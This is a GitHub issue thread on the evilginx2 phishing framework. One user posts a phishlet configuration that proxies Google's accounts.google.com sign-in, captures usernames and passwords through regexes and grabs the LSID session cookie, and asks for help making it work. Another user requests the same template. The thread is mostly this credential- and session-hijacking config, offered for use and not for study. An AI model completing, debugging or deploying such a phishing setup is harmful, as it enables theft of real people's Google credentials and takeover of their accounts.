### ISSUE TITLE
Google phishllest

### ISSUE THREAD

**Issue by sagargpt73** [kgretzky/evilginx2#13]
Here is my code for google can u let me know where is the problem.
======================================================
proxy_hosts:
  - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
sub_filters:
  - {hostname: 'accounts.google.com', sub: 'accounts', domain: 'google.com', search: 'action="https://{hostname}/signin/', replace: 'action="https://{hostname}/signin/', mimes: ['text/html', 'application/json']}
  - {hostname: 'accounts.google.com', sub: 'accounts', domain: 'google.com', search: 'href="https://{hostname}/speedbump/', replace: 'href="https://{hostname}/speedbump/', mimes: ['text/html', 'application/json']}
  - {hostname: 'accounts.google.com', sub: 'accounts', domain: 'google.com', search: '//{hostname}', replace: '//{hostname}', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: 'accounts.google.com'
    keys: ['LSID']
user_regex:
  key: 'identifier'
  re: '(.*)'
pass_regex:
  key: 'password'
  re: '(.*)'
landing_path:
  - '/signin'

===================
please help me

**Comment by shellerto** [comment]
Hi
i need thise teamplate
please help !!!

**Comment by sagargpt73** [comment]
shellerto can you help me on this may be the author does not does not wants to help us.

**Comment by shellerto** [comment]
oh
are you irani
